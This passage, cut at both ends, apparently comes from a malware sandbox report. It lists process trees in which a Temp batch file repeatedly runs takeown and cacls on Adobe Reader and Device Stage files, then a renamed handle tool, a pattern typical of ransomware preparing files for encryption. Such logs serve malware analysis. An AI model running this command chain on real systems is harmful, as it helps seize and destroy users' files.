    PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:1548
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    - Modifies file permissions
    PID:1264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:1428
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:1948
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    - Modifies file permissions
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:528
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1468
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:1584
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    - Modifies file permissions
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:1428
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:528
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1468
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1012
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1548
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "license.html" -nobanner
    3⤵
    PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "license.html" -nobanner
      4⤵
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
